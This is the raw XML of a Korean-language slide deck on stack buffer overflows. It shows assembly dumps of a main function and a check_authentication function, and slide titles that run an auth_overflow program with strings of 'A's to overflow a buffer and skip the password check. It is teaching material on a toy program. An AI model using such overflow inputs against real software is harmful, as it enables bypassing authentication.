              <a:t>ebp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0x0804851a &lt;+1&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp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0x0804851c &lt;+3&gt;:	sub    $0x8,%esp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0x0804851f &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x08048523 &lt;+10&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     0x8048547 &lt;main+46&gt;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0x08048525 &lt;+12&gt;:	mov    0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x08048528 &lt;+15&gt;:	mov    (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx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0x0804852a &lt;+17&gt;:	mov    $0x8048674,%eax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0x0804852f &lt;+22&gt;:	mov    %edx,0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x08048533 &lt;+26&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x08048536 &lt;+29&gt;:	call   0x8048360 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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0x0804853b &lt;+34&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2500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sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048542 &lt;+41&gt;:	call   0x80483a0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>exit@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="25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E0E7F-D653-274C-B7AD-0A278D76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1434"/>
            <a:ext cx="11939752" cy="6621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Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048547 &lt;+46&gt;:	mov    0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x0804854a &lt;+49&gt;:	add    $0x4,%eax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dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x0804854d &lt;+52&gt;:	mov    (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x0804854f &lt;+54&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048552 &lt;+57&gt;:	call   0x8048474 											&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048557 &lt;+62&gt;:	test   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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F4E5A-CFBD-A545-BC45-14A80A83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E0C85-CDC4-6043-9300-5B46F24D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AC21F1-9F93-964C-B689-4F3139670BB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="34290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Monaco" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dump of assembler code for function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr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06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DC202-3EDD-1C47-B1A6-F3F54DB2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952"/>
            <a:ext cx="10515600" cy="66530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0x08048474 &lt;+0&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp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0x08048475 &lt;+1&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp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0x08048477 &lt;+3&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi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0x08048478 &lt;+4&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi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0x08048479 &lt;+5&gt;:	sub    $0x1c,%esp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0x0804847c &lt;+8&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x08048483 &lt;+15&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0x1c(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x0804848a &lt;+22&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0x18(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x08048491 &lt;+29&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0x14(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x08048498 &lt;+36&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0x10(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x0804849f &lt;+43&gt;:	mov    0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" dirty="0">
              <a:latin typeface="Monaco" pitchFamily="2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altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x080484a2 &lt;+46&gt;:	mov    %eax,0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US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5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1114</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>562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Monaco</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>스택 버퍼 오버플로우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&gt;&gt; ./auth_overflow $(perl –e ’print “A”x16’) ?</vt:lpstr>
      <vt:lpstr>&gt;&gt; ./auth_overflow $(perl –e ’print “A”x17’) ?</vt:lpstr>
      <vt:lpstr>&gt;&gt; ./auth_overflow $(perl –e ’print “A”x32’)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스택 버퍼 오버 플로우</dc:title>
  <dc:creator>조한주</dc:creator>
  <cp:lastModifiedBy>조한주</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <cp:lastPrinted>2019-08-15T06:24:11Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-08-14T03:41:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-15T06:24:35Z</dcterms:modified>
</cp:coreProperties>
</file>